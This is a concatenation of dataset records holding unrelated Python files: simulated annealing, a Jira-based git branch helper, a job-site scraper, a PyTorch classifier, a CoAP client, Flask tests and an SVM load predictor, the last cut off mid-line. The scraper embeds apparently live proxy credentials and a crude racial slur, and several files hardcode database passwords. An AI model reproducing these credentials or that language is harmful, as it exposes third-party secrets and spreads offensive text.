\n Improvements or equivalent solutions are kept for the next iteration.\n Worse solutions are sometimes kept, depending on the temperature.\n \"\"\"\n def __init__(self, grid, temperature=1):\n # Use the init of the Hillclimber class\n super().__init__(grid)\n\n # Starting temperature and current temperature\n self.T0 = temperature\n self.T = temperature\n\n def update_temperature(self):\n \"\"\"\n This function implements a *exponential* cooling scheme.\n Alpha can be any value below 1 but above 0.\n Temperature will become zero after all iterations passed to the run()\n method have passed.\n \"\"\"\n alpha = 0.99\n self.T = self.T * alpha\n\n def check_solution(self, new_grid):\n \"\"\"\n Checks and accepts better solutions than the current solution.\n Also sometimes accepts solutions that are worse, depending on the current\n temperature.\n \"\"\"\n new_cost = self.calculate_cost(new_grid)\n old_cost = self.calculate_cost(self.grid)\n\n # Calculate the probability of accepting this new grid\n delta = new_cost - old_cost\n probability = math.exp(-delta / self.T)\n\n # Pull a random number between 0 and 1 and see if we accept the graph!\n if random.random() < probability:\n self.no_improvement = 0\n self.grid = new_grid\n self.cost = new_cost\n print(f\"Accepted a different solution: {self.cost}!\")\n else:\n self.no_improvement += 1\n\n # Update the temperature\n self.update_temperature()\n","sub_path":"code/algorithms/sim_anneal.py","file_name":"sim_anneal.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311833361","text":"from .common import menu, addparents, AllBranches\nfrom lagoon import git\nimport sys, subprocess, os, tempfile, re\n\nwordpattern = re.compile(r'[^\\s/]+')\n\ndef main_mkbranch():\n 'Create a branch for the given ticket(s) named according to git policy.'\n tickets = sys.argv[1:]\n with tempfile.NamedTemporaryFile() as cookiesfile:\n subprocess.run([os.path.join(os.path.dirname(__file__), 'extract_cookies.sh')], stdout = cookiesfile, check = True)\n wget = subprocess.Popen(['wget', '-O', '-', \"%s/browse/%s\" % (os.environ['JIRA_URL'], tickets[0]), '--load-cookies', cookiesfile.name], stdout = subprocess.PIPE)\n words = [w.lower() for w in wordpattern.findall(subprocess.run([os.path.join(os.environ['GOPATH'], 'bin', 'pup'), 'h1 text{}'], stdin = wget.stdout, stdout = subprocess.PIPE).stdout.decode())]\n wget.wait()\n prefix = ''.join(\"%s_\" % t.translate({ord('-'): None}).lower() for t in tickets)\n options = [prefix + '_'.join(words[:i + 1]) for i in range(len(words))]\n _, name = menu([[o, ''] for o in options], 'Branch name')\n _, base = menu([[n, ''] for n in AllBranches().names], 'From')\n git.checkout._b.print(name, base)\n addparents(name, base)\n","sub_path":"dev_bin/mkbranch.py","file_name":"mkbranch.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"447019150","text":"\"\"\" \n@Author: huuuuusy\n@GitHub: https://github.com/huuuuusy\n系统: Ubuntu 18.04\nIDE: VS Code\n工具: python3\n\"\"\"\n\n\"\"\"\n实验9-1:文件读取\n\"\"\"\n#!/usr/bin/env python3\nname = input(\"Enter the file name: \")\nfobj = open(name)\nprint(fobj.read())\nfobj.close()","sub_path":"Language/Python3/SYL-Python3/exp9-文件处理/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
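The simulated_annealing record above (sub_path code/algorithms/sim_anneal.py) pairs an exponential cooling schedule (T <- alpha * T with alpha = 0.99, so T decays toward zero but never exactly reaches it) with the Metropolis acceptance rule exp(-delta / T). A minimal runnable sketch of that acceptance logic follows; the accept helper and the sample costs are illustrative assumptions, not part of the dataset record.

import math
import random

def accept(old_cost, new_cost, T):
    # Metropolis rule as used in check_solution: an improvement gives
    # delta < 0, hence exp(-delta / T) > 1, so it is always accepted;
    # a worse solution survives with probability exp(-delta / T) < 1,
    # which shrinks as T cools.
    delta = new_cost - old_cost
    return random.random() < math.exp(-delta / T)

T, alpha = 1.0, 0.99
for step in range(3):
    print(step, round(T, 4), accept(10.0, 10.5, T))
    T *= alpha  # exponential cooling, mirroring update_temperature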
+{"seq_id":"288312180","text":"from schnorr_dss import *\n\n\ndef main() -> None:\n m = b'hello, world'\n sk, pk = gen_key()\n print(sk, pk)\n\n sig = sign(m, sk)\n print(sig)\n\n m1 = b'hello, world1'\n print(verify(m, pk, sig))\n print(verify(m1, pk, sig))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"schnorr_dss_test.py","file_name":"schnorr_dss_test.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353338530","text":"import scrapy\nfrom scrapy.selector import Selector\nimport requests\nimport time\nimport requests\nfrom kanzhun_search.items import KanzhunSearchItem\n\nheaders = {\"User-Agent\": \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\"}\n\nproxyHost = \"proxy.abuyun.com\"\nproxyPort = \"9020\"\n\nproxyUser = \"H020G39R1142524D\"\nproxyPass = \"E440F4C798A80714\"\n\nproxyMeta = \"http://%(user)s:%(pass)s@%(host)s:%(port)s\" % {\n \"host\": proxyHost,\n \"port\": proxyPort,\n \"user\": proxyUser,\n \"pass\": proxyPass,\n}\n\nproxies = {\n \"http\": proxyMeta,\n \"https\": proxyMeta,\n}\n\ndef clean(x):\n x = str(x)\n x = x.replace('\\\\r', '').replace('\\\\t', '').replace('\\\\n', '').replace('\"', '').replace(\" \", \"\").replace(\"|\",\"\").replace('[','').replace(']','').replace(\"'\",'').replace(',','').replace('\\n','').replace('\\t','').replace('\\r','')\n return x\n\nclass KanzhunSearchSpider(scrapy.Spider):\n name = 'kanzhun_search'\n allowed_domain = 'http://www.kanzhun.com'\n page = 1\n\n def start_requests(self):\n\n for type in [116,119,5,4,65,64,62,54,53,57,56,60,55]:\n\n url = 'http://www.kanzhun.com/jobli_' +str(type) +'-t_0-e_0-d_0-s_0-j_0-k_0/p1/?q=%s&ka=paging1'\n yield scrapy.Request(url % self.searchword, callback= self.parse_page)\n\n def parse_page(self,response):\n\n sel = Selector(response)\n titles = sel.xpath('//div[@class=\"sparrow\"]/dl/dd')\n\n for title in titles:\n\n item = KanzhunSearchItem()\n item['positionName'] = clean(title.xpath('h3/a//text()').extract())\n item['salary'] = clean(title.xpath('p[@class=\"request grey_99\"]/b[@class=\"salary\"]/text()').extract())\n item['description'] = clean(title.xpath('p[@class=\"company_advantage\"]/text()').extract())\n item['job_loc'] = clean(title.xpath('p[@class=\"request grey_99\"]/span[@class=\"city\"]/text()').extract())\n # print(title.xpath('p[@class=\"request grey_99\"]/text()').extract())\n item['job_suffer'] = clean(title.xpath('p[@class=\"request grey_99\"]/text()').extract()[2])\n item['job_edu'] = clean(title.xpath('p[@class=\"request grey_99\"]/text()').extract()[3])\n item['job_type'] = clean(title.xpath('p[@class=\"request grey_99\"]/text()').extract()[4])\n item['job_time'] = clean(title.xpath('p[@class=\"request grey_99\"]/text()').extract()[5])\n\n\n\n item['companyFullName'] = clean(title.xpath('p[@class=\"jieshao\"]/a/text()').extract())\n\n if title.xpath('p[@class=\"jieshao\"]/a/@href').extract():\n\n co_url = 'http://www.kanzhun.com' + title.xpath('p[@class=\"jieshao\"]/a/@href').extract()[0]\n co_page = requests.get(co_url, headers = headers, proxies=proxies)\n # co_page = requests.get(co_url, headers = headers)\n co_sel = Selector(co_page)\n\n try:\n # print(co_sel.xpath('//div[@class=\"bw_explain\"]/text()'))\n item['industryField'] = clean(co_sel.xpath('//div[@class=\"bw_explain\"]/span[1]/text()').extract())\n item['co_loc'] = clean(co_sel.xpath('//div[@class=\"bw_explain\"]/span[2]/text()').extract())\n 
item['companySize'] = clean(co_sel.xpath('//div[@class=\"bw_explain\"]/span[last()]/text()').extract())\n item['co_des'] = clean(co_sel.xpath('//div[@class=\"bw_brief\"]/text()').extract())\n\n except:\n print('shit company')\n\n yield item\n\n next_page = sel.xpath('//a[@class=\"p_next\"]/@href')\n\n if next_page:\n\n next_page = 'http://www.kanzhun.com' +next_page.extract()[0]\n self.page += 1\n print('go {} page'.format(self.page))\n yield scrapy.Request(next_page, callback= self.parse_page)\n\n else:\n print('No next pages, nigga!!\\n')\n\n","sub_path":"theproduct/qinzhihao/search/spider_kanzhun_search/kanzhun_search/spiders/kanzhun_search.py","file_name":"kanzhun_search.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"53698595","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 18 00:46:41 2021\n\n@author: MaxiT\n\"\"\"\nimport numpy as np\nfrom sklearn import model_selection\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import roc_curve\nimport torch\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import confusion_matrix\n\n\ndef plot_confusion_matrix(cm,\n target_names,\n title='Confusion matrix',\n cmap=None,\n normalize=True):\n \"\"\"\n given a sklearn confusion matrix (cm), make a nice plot\n\n Arguments\n ---------\n cm: confusion matrix from sklearn.metrics.confusion_matrix\n\n target_names: given classification classes such as [0, 1, 2]\n the class names, for example: ['high', 'medium', 'low']\n\n title: the text to display at the top of the matrix\n\n cmap: the gradient of the values displayed from matplotlib.pyplot.cm\n see http://matplotlib.org/examples/color/colormaps_reference.html\n plt.get_cmap('jet') or plt.cm.Blues\n\n normalize: If False, plot the raw numbers\n If True, plot the proportions\n\n Usage\n -----\n plot_confusion_matrix(cm = cm, # confusion matrix created by\n # sklearn.metrics.confusion_matrix\n normalize = True, # show proportions\n target_names = y_labels_vals, # list of names of the classes\n title = best_estimator_name) # title of graph\n\n Citiation\n ---------\n http://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html\n\n \"\"\"\n import matplotlib.pyplot as plt\n import numpy as np\n import itertools\n\n accuracy = np.trace(cm) / float(np.sum(cm))\n misclass = 1 - accuracy\n\n if cmap is None:\n cmap = plt.get_cmap('Blues')\n\n plt.figure()\n plt.grid(False)\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n\n if target_names is not None:\n tick_marks = np.arange(len(target_names))\n plt.xticks(tick_marks, target_names, rotation=45)\n plt.yticks(tick_marks, target_names)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n\n thresh = cm.max() / 1.5 if normalize else cm.max() / 2\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n if normalize:\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n else:\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else 
\"black\")\n\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label\\naccuracy={:0.4f}; misclass={:0.4f}'.format(accuracy, misclass))\n plt.show()\n \n\n\nclass CustomDataset(Dataset):\n def __init__(self, X, Y):\n self.X=X\n self.Y=Y\n \n def __len__(self):\n return self.X.shape[0]\n \n def __getitem__(self, idx):\n return self.X[idx,:], self.Y[idx]\n \n\nclass TestCustomDataset(Dataset):\n def __init__(self, X):\n self.X=X\n \n def __len__(self):\n return self.X.shape[0]\n \n def __getitem__(self, idx):\n return self.X[idx,:]\n\n\nclass NNetLayers(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.linear_1 = torch.nn.Linear(in_features=2, out_features=10, bias = True)\n self.activation_1 = torch.nn.ReLU()\n self.dropout_1= torch.nn.Dropout(p=0.05)\n self.linear_2 = torch.nn.Linear(in_features=10, out_features=20, bias = True)\n self.activation_2 = torch.nn.ReLU()\n self.dropout_2= torch.nn.Dropout(p=0.05)\n self.linear_3 = torch.nn.Linear(in_features=20, out_features=1, bias = True)\n self.activation_3 = torch.nn.Sigmoid()\n\n def forward(self, x):\n # X es el batch que va a entrar\n z1 = self.linear_1(x)\n a1 = self.activation_1(z1)\n d1 = self.dropout_1(a1)\n z2 = self.linear_2(d1)\n a2 = self.activation_2(z2)\n d2 = self.dropout_2(a2)\n z3 = self.linear_3(d2)\n y = self.activation_3(z3)\n return y\n \n \nclass NnetBinaryClass():\n \n def __init__(self):\n self.nnet = NNetLayers()\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n pass\n \n \n def fit(self,x_train, y_train, x_valid=None, y_valid=None, \\\n batch_size = 32, lr=0.001, epochs=50, verbose=True):\n \n training_set = CustomDataset(x_train, y_train)\n training_dataloader = DataLoader(training_set,batch_size=batch_size, \\\n shuffle=True)\n \n if (x_valid is not None) & (y_valid is not None):\n valid_set = CustomDataset(x_valid, y_valid) \n valid_dataloader = DataLoader(valid_set,batch_size=len(valid_set), \\\n shuffle= True)\n \n # Optimizer\n criterion = torch.nn.BCELoss(reduction='sum')\n optimizer = torch.optim.Adam(self.nnet.parameters(),\\\n lr=0.001)\n \n # Training\n self.nnet.to(self.device)\n \n history_loss=[]\n history_train_auc=[]\n history_valid_auc=[]\n \n for epoch in range(epochs):\n running_loss = 0\n nnet_train_scores = []\n train_truth = []\n self.nnet.train()\n for i, data in enumerate(training_dataloader):\n # data es una tupla batch (data, label)\n x, y = data #todavia esta en numpy\n x = x.to(self.device).float() #convierte a tensores y pasa a GPU si esta disponible\n y = y.to(self.device).float() #convierte a tensores y pasa a GPU si esta disponible\n \n # set gradient to zero\n optimizer.zero_grad()\n \n # forward\n y_hat = self.nnet(x)\n \n # loss\n loss = criterion(y_hat[:,0], y)\n \n # backward\n loss.backward()\n \n # update of parameters\n optimizer.step()\n \n # compute loss and statistics\n running_loss += loss.item()\n \n train_truth += list(y.detach().numpy()) \n nnet_train_scores += list(y_hat[:,0].detach().numpy())\n \n history_loss.append(running_loss/x_train.shape[0])\n \n train_auc = roc_auc_score(train_truth, nnet_train_scores)\n history_train_auc.append(train_auc)\n \n \n if (verbose) & ((epoch) % (epochs/10)==0):\n self.nnet.eval()\n with torch.no_grad():\n \n if (x_valid is not None) & (y_valid is not None):\n \n nnet_valid_scores = []\n valid_truth = []\n \n for i, data in enumerate(valid_dataloader):\n # batch\n x, y = data\n x = x.to(self.device).float()\n y = y.to(self.device).float()\n \n # forward \n 
y_hat = self.nnet(x)\n \n # accumulate data\n valid_truth += list(y.detach().numpy()) \n nnet_valid_scores += list(y_hat[:,0].detach().numpy())\n \n valid_auc = roc_auc_score(valid_truth, nnet_valid_scores)\n history_valid_auc.append(valid_auc)\n \n print(f\"Epoch = {epoch} | \" + \\\n f\"loss = {running_loss / x_train.shape[0]} | \" + \\\n f\"train auc: {train_auc}\" + \\\n f\"valid auc: {valid_auc}\")\n else:\n print(f\"Epoch = {epoch} | \" + \\\n f\"loss = {running_loss / x_train.shape[0]} | \" +\\\n f\"train auc: {train_auc}\")\n \n return history_loss,history_train_auc, history_valid_auc\n \n def predict(self,x):\n self.nnet.eval()\n with torch.no_grad():\n test_set = TestCustomDataset(x)\n test_dataloader = DataLoader(test_set,batch_size=len(test_set), \\\n shuffle= False)\n \n for i, data in enumerate(test_dataloader):\n x = data \n x = x.to(self.device).float() \n y_hat = self.nnet(x)\n y_hat = y_hat[:,0].detach().numpy()\n y_hat = y_hat >= 0.5\n\n return y_hat\n \n def predict_proba(self,x):\n self.nnet.eval()\n with torch.no_grad():\n test_set = TestCustomDataset(x)\n test_dataloader = DataLoader(test_set,batch_size=len(test_set), \\\n shuffle= False)\n \n for i, data in enumerate(test_dataloader):\n x = data \n x = x.to(self.device).float() \n y_hat = self.nnet(x)\n y_hat = y_hat[:,0].detach().numpy()\n\n return y_hat\n \n\n\ndef test_NnetBinaryClass(): \n \n X1 = np.random.uniform(0,8,10000)\n U = np.random.uniform(0,1,10000)\n N1 = np.random.normal(3,0.1,10000)\n N2 = np.random.normal(-1,0.1,10000)\n X2 = (X1-4)**2\n X2[U>=0.5] = X2[U>=0.5] + N1[U >= 0.5]\n X2[U < 0.5] = X2[U < 0.5] + N2[U < 0.5]\n Y = np.zeros(10000)\n mask = X2 >= (X1-4)**2\n Y[mask] = 1\n Y[~mask] = 0\n \n fig, ax = plt.subplots(1,1)\n ax.scatter(X1[Y==0],X2[Y==0], color='blue')\n ax.scatter(X1[Y==1],X2[Y==1], color='red')\n plt.show\n \n X1=X1[:,np.newaxis]\n X2=X2[:,np.newaxis]\n x=np.append(X1, X2, axis = 1)\n \n x_train, x_test, Y_train, Y_test = \\\n model_selection.train_test_split( x, Y, test_size=0.2, random_state=5)\n \n x_train, x_valid, Y_train, Y_valid= \\\n model_selection.train_test_split( x_train, Y_train, \\\n test_size=0.2, random_state=5)\n \n model = NnetBinaryClass()\n \n model.fit(x_train,Y_train,x_valid,Y_valid)\n \n y_test_hat = model.predict(x_test)\n \n plt.figure()\n plt.scatter(x_test[y_test_hat==0,0],x_test[y_test_hat==0,1],color='blue')\n plt.scatter(x_test[y_test_hat==1,0],x_test[y_test_hat==1,1],color='red')\n plt.title('Dataset Test')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()\n \n test_accuracy = accuracy_score(Y_test,y_test_hat)\n test_recall = recall_score(Y_test,y_test_hat)\n test_precision = precision_score(Y_test, y_test_hat)\n test_f1 = f1_score(Y_test,y_test_hat)\n print(f\"Accuracy: {test_accuracy}\")\n print(f\"Recall: {test_recall}\")\n print(f\"Precision: {test_precision}\")\n print(f\"F1-Score: {test_f1}\")\n \n conf_matrix = confusion_matrix(Y_test, y_test_hat)\n plot_confusion_matrix(conf_matrix,target_names = np.unique(Y_test), \\\n title = \"Confusion Matrix\")\n# Run test\ntest_NnetBinaryClass() ","sub_path":"Examen/Scripts/NNet_binary_clasification.py","file_name":"NNet_binary_clasification.py","file_ext":"py","file_size_in_byte":11951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"493553995","text":"from coapthon.client.helperclient import HelperClient\r\nfrom coapthon import defines\r\nfrom coapthon.messages.request import Request\r\n\r\n\r\nhost = \"127.0.0.1\"\r\nport = 5683\r\npath 
=\"basic\"\r\npayload = 'text/plain'\r\n\r\nclient = HelperClient(server=(host, port))\r\nresponse = client.get(path)\r\nprint(response.pretty_print())\r\n\r\n# Create a registration resource\r\nct = {'content_type': defines.Content_types[\"application/link-format\"]}\r\npayload = 'Random text1234'\r\nresponse = client.post(path, payload, None, None, **ct)\r\nlocation_path = response.location_path\r\nprint(response.pretty_print())\r\n \r\nclient.stop()\r\n","sub_path":"pmsclient.py","file_name":"pmsclient.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192290060","text":"import json\n\nimport pytest\n\nfrom app import create_app\n\n\n@pytest.fixture()\ndef testing_client():\n app = create_app(config='test')\n\n test_client = app.test_client()\n\n ctx = app.app_context()\n ctx.push()\n\n yield test_client\n\n ctx.pop()\n\n\ndef _load_data(filepath):\n with open(filepath) as f:\n data = json.load(f)\n return data\n\n\ndef test_level1(testing_client):\n data = _load_data('./level1/data.json')\n\n response = testing_client.post('/checkout', json=data)\n assert response.status_code == 200\n\n output = _load_data('./level1/output.json')\n assert output == response.get_json()\n\n\ndef test_level2(testing_client):\n data = _load_data('./level2/data.json')\n\n response = testing_client.post('/checkout', json=data)\n assert response.status_code == 200\n\n output = _load_data('./level2/output.json')\n assert output == response.get_json()\n\n\ndef test_level3(testing_client):\n data = _load_data('./level3/data.json')\n\n response = testing_client.post('/checkout', json=data)\n assert response.status_code == 200\n\n output = _load_data('./level3/output.json')\n assert output == response.get_json()\n","sub_path":"backend/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25158026","text":"\"\"\"\n第四代:仅对未来进行预测,使用未来数据,不使用预测数据,对一些异常点单独测试,模块化,SVM预测模型\n\"\"\"\nimport pymysql\nimport numpy as np\nimport datetime\nimport math\nfrom sklearn import svm\nimport warnings\n\nname = \"SVM回归分析\"\nThreshold = 45 # 49\n#sigma = math.sqrt(0.5) # 0.5\n#mu = 0.94 # 0.94\n#SIM_range = 1 # 1\n#sigmaList = [math.sqrt(0.5),math.sqrt(1)]\n#muList = [0.7,0.8,0.9,0.94]\nSIM_range = 1\n#sigmaList = [math.sqrt(0.25),math.sqrt(0.5),math.sqrt(0.75),math.sqrt(1),math.sqrt(1.25),math.sqrt(1.5),math.sqrt(1.75),math.sqrt(2)]\nsigmaList = [math.sqrt(0.25),math.sqrt(0.5),math.sqrt(0.75),math.sqrt(1)]\n#sigmaList = [math.sqrt(0.5),math.sqrt(1)]\n#muList = [0.1,0.125,0.15,0.175,0.2,0.225,0.25,0.275,0.3,0.325,0.35,0.375,0.4,0.425,0.45,0.475,0.5,0.525,0.55,0.575,0.6,0.625,0.65,0.675,0.7,0.725,0.75,0.775,0.8,0.825,0.85,0.875,0.9,0.925,0.94,0.95,0.975,0.98,0.985,0.99]\n#muList = [0.7,0.71,0.72,0.73,0.74,0.75,0.76,0.77,0.78,0.79,0.8,0.81,0.82,0.83,0.84,0.85,0.86,0.87,0.88,0.89,0.9,0.91,0.92,0.93,0.94,0.95,0.96,0.97,0.98,0.99]\n#muList = [0.7,0.725,0.75,0.775,0.8,0.825,0.85,0.875,0.9,0.91,0.925,0.94,0.95,0.96,0.975,0.98,0.99]\n#muList = [0.7,0.75,0.8,0.85,0.9,0.91,0.925,0.94,0.95,0.96,0.975,0.98,0.99]\nmuList = [0.9,0.91,0.925,0.94,0.95,0.96,0.975,0.98,0.99]\nMaxValue = 10000\n\nclass PredictList:\n def __init__(self, date=[], real=[], predict=[], MAPE=0):\n self.date = date\n self.real = real\n self.predict = predict\n self.MAPE = MAPE\n\ndef data_search(searchtype, dd, ss, hld, fs, type=1, datatype=1):\n conn = 
pymysql.connect(host='localhost', port=3306, user='yxl', passwd='123456', db='powerload')  # db: database name\n    cur = conn.cursor()\n    TempList = []\n    Count = cur.execute('select ' + searchtype + ' from data' + dd + ss + hld + fs)\n    results = cur.fetchall()\n    result = list(results)\n    for r in result:\n        TempList.append(('%s' % r))\n    if type == 1:\n        if Count > Threshold:\n            Temp = TempList[Count - Threshold:]\n        else:\n            Temp = TempList\n    else:\n        Temp = TempList\n    cur.scroll(0, mode='absolute')\n    cur.close()\n    conn.close()\n    if datatype == 1:\n        TempList = []\n        for num in Temp:\n            num = float(num)\n            TempList.append(num)\n        return TempList\n    else:\n        cur.scroll(0, mode='absolute')\n        return Temp\n\ndef pre_week(date_list,predict_type,index):\n    conn = pymysql.connect(host='localhost', port=3306, user='yxl', passwd='123456', db='powerload')  # db: database name\n    cur = conn.cursor()\n    current_data_list = []\n\n    for date in date_list:\n        current_data = []\n        Count = cur.execute('select ' + predict_type + ' from data '\n                                                       'where date = DATE_SUB(\"' + date + '\",'\n                                                       'INTERVAL ' + str(index) + ' DAY);')\n        if Count == 0:\n            Count = cur.execute('select ' + predict_type + ' from data '\n                                                           'where date = \"' + date + '\";')\n        results = cur.fetchall()\n        result = list(results)\n        for r in result:\n            current_data.append(('%s' % r))\n        for num in current_data:\n            num = float(num)\n            current_data_list.append(num)\n\n    cur.close()\n    conn.close()\n    return current_data_list\n\ndef CalMAPE(Data_List_1, Data_List_2):\n    SumMAPE = 0\n    for pl in range(len(Data_List_1)):\n        SumMAPE += abs(Data_List_1[pl] - Data_List_2[pl]) / Data_List_1[pl]\n    MAPE = SumMAPE / len(Data_List_1)\n    return MAPE\n\ndef CalMASE(Data_List_1, Data_List_2):\n    SumMASE_1 = 0\n    SumMASE_2 = 0\n    for pl in range(len(Data_List_1)):\n        SumMASE_1 += abs(Data_List_2[pl] - Data_List_1[pl])\n        if pl:\n            SumMASE_2 += abs(Data_List_1[pl - 1] - Data_List_1[pl])\n    MASE_1 = SumMASE_1 / len(Data_List_1)\n    MASE_2 = SumMASE_2 / (len(Data_List_1) - 1)\n    MASE = MASE_1 / MASE_2\n    return MASE\n\ndef Predict_Main(date_start=\"2007-1-1\", date_end=\"2007-12-31\", paramter = 5, predicttype=\"Max\"):\n    warnings.filterwarnings(\"ignore\")\n\n    if predicttype == \"Max\":\n        predict_type = \"PowerLoadMax\"\n    elif predicttype == \"Aver\":\n        predict_type = \"PowerLoadAver\"\n    elif predicttype == \"Min\":\n        predict_type = \"PowerLoadMin\"\n    else:\n        pass\n\n    date_predict = []\n    SVM_result = []\n\n    conn = pymysql.connect(host='localhost', port=3306, user='yxl', passwd='123456', db='powerload')  # db: database name\n    cur = conn.cursor()\n    Count = cur.execute('select date from data where date >= \"'\n                        + date_start + '\" and date <= \"' + date_end + '\";')\n    results = cur.fetchall()\n    result = list(results)\n    for r in result:\n        date_predict.append(('%s' % r))\n    date_during = \" where date >= '\" + date_start + \"' and date <= '\" + date_end + \"'\"\n\n    cur.scroll(0, mode='absolute')\n    cur.close()\n    conn.close()\n\n    AverTemper_predict = data_search(\"AverTemper\", date_during, \"\", \"\", \";\", 0, 1)\n    AverPress_predict = data_search(\"AverPress\", date_during, \"\", \"\", \";\", 0, 1)\n    AverSPress_predict = data_search(\"AverSPress\", date_during, \"\", \"\", \";\", 0, 1)\n    LowTemper_predict = data_search(\"LowTemper\", date_during, \"\", \"\", \";\", 0, 1)\n    HighTemper_predict = data_search(\"HighTemper\", date_during, \"\", \"\", \";\", 0, 1)\n    LowPress_predict = data_search(\"LowPress\", date_during, \"\", \"\", \";\", 0, 1)\n    HighPress_predict = data_search(\"HighPress\", date_during, \"\", \"\", \";\", 0, 1)\n    PowerLoadMax_real = 
data_search(predict_type, date_during, \"\", \"\", \";\", 0, 1)\n\n pre_best_i = 0\n pre_best_j = 0\n\n for date_index in range(len(date_predict)):\n date_during = \" where date < '\" + date_predict[date_index] + \"'\"\n season = \" and date in (select date from date where season = (select season from date where date = '\" + \\\n date_predict[date_index] + \"'))\"\n holiday = \" and date in (select date from date where holiday = (select holiday from date where date = '\" + \\\n date_predict[date_index] + \"') and week = (select week from date where date = '\" + \\\n date_predict[date_index] + \"'))\"\n finish_signal = \";\"\n\n if paramter == 1:\n season = \"\"\n holiday = \"\"\n elif paramter == 3:\n holiday = \"\"\n elif paramter == 5:\n season = \"\"\n else:\n pass\n\n data_history = data_search(\"date\", date_during, season, holiday, finish_signal, 1, 0) \\\n + [date_predict[date_index], ]\n AverTemper = data_search(\"AverTemper\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [AverTemper_predict[date_index], ]\n AverPress = data_search(\"AverPress\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [AverPress_predict[date_index], ]\n AverSPress = data_search(\"AverSPress\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [AverSPress_predict[date_index], ]\n LowTemper = data_search(\"LowTemper\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [LowTemper_predict[date_index], ]\n HighTemper = data_search(\"HighTemper\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [HighTemper_predict[date_index], ]\n LowPress = data_search(\"LowPress\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [LowPress_predict[date_index], ]\n HighPress = data_search(\"HighPress\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [HighPress_predict[date_index], ]\n PowerLoadMax = data_search(predict_type, date_during, season, holiday, finish_signal, 1, 1)\n\n history_1 = pre_week(data_history, predict_type, 1)\n history_2 = pre_week(data_history, predict_type, 2)\n history_3 = pre_week(data_history, predict_type, 3)\n history_4 = pre_week(data_history, predict_type, 4)\n history_5 = pre_week(data_history, predict_type, 5)\n history_6 = pre_week(data_history, predict_type, 6)\n history_7 = pre_week(data_history, predict_type, 7)\n\n current_data = []\n current_data.append(AverTemper_predict[date_index])\n current_data.append(AverPress_predict[date_index])\n current_data.append(AverSPress_predict[date_index])\n current_data.append(LowTemper_predict[date_index])\n current_data.append(HighTemper_predict[date_index])\n current_data.append(LowPress_predict[date_index])\n current_data.append(HighPress_predict[date_index])\n current_data.append(history_1[len(history_1) - 1])\n current_data.append(history_2[len(history_2) - 1])\n current_data.append(history_3[len(history_3) - 1])\n current_data.append(history_4[len(history_4) - 1])\n current_data.append(history_5[len(history_5) - 1])\n current_data.append(history_6[len(history_6) - 1])\n current_data.append(history_7[len(history_7) - 1])\n\n samplein = np.mat([AverTemper, AverPress, AverSPress, LowTemper, HighTemper, LowPress, HighPress, history_1, history_2, history_3, history_4, history_5, history_6, history_7])\n sample_predict = np.mat([current_data, ] * len(data_history)).T\n sampleinminmax = np.array([samplein.min(axis=1).T.tolist()[0], samplein.max(axis=1).T.tolist()[0]]).transpose()\n sampleinnorm = ((np.array(samplein.T) - sampleinminmax.transpose()[0]) / (\n sampleinminmax.transpose()[1] - 
